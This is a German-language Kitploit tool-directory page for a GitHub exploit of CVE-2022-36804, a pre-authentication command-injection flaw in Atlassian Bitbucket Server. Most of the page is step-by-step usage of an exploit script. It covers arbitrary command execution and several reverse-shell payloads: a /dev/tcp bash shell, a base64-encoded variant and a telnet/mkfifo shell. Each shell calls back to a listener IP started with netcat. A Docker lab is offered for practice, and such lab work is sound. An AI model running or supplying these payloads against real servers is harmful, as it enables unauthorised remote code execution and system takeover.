Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2022-36804 — Eine kritische Command-Injection-Schwachstelle wurde in mehreren API-Endpunkten des Atlassian Bit bucket Server und Data Center gefunden. Diese Schwachstelle betrifft alle Versionen von Bitbucket Server und Data Center, die vor den Versionen <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 und <8.3.1 veröffentlicht wurden. | Kitploit
Tools/GitHubGitHub/walnutsecurity/cve-2022-36804
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLabs & Praxis
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

84vor 3 JahrenNoch nicht geprüft

Eine kritische Command-Injection-Schwachstelle wurde in mehreren API-Endpunkten des Atlassian Bit bucket Server und Data Center gefunden. Diese Schwachstelle betrifft alle Versionen von Bitbucket Server und Data Center, die vor den Versionen <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 und <8.3.1 veröffentlicht wurden.

Teilen

CVE-2022-36804: Pre-Auth RCE in Atlassian Bitbucket Server

In mehreren API-Endpunkten des Atlassian Bitbucket Server und Data Center wurde eine kritische Command-Injection-Schwachstelle gefunden. Diese Schwachstelle betrifft alle Versionen von Bitbucket Server und Data Center, die vor den Versionen <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> und <8.3.1> veröffentlicht wurden.

Labor für CVE-2022-36804

Docker-Image erstellen

root@kitploit:~
docker build -t bitbucket .

Docker ausführen

root@kitploit:~
docker run -it bitbucket

Verwendung von cve-2022-36804.py

Auf Remote Code Execution (RCE) prüfen

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Auf RCE mit benutzerdefiniertem Befehl (cmd) prüfen

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Auf RCE mit benutzerdefiniertem Befehl, Projektschlüssel und Repository-Namen prüfen

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Auf privates Repository prüfen

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074CFF8A5D13088332C8DF0CD8A7CE7

Shell mit netcat erhalten

Ersetzen Sie 172.17.0.3 durch Ihre lokale IP-Adresse

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

Netcat-Listener starten mit:

root@kitploit:~
nc -lvp 4444

Konvertieren Sie /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 in base64, falls bei der Ausführung des Payloads ein Fehler auftritt.

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

Falls weiterhin Fehler auftreten, führen Sie den folgenden Befehl aus:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

Es wird empfohlen, für Übungszwecke eine verwundbare Version des Bitbucket Server auf einem Windows-/Linux-Rechner zu installieren. Im Vergleich zu Docker-Images lässt sich so leichter eine Reverse Shell erhalten.

Weitere Informationen finden Sie hier

Referenzen

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
Tool herunterladen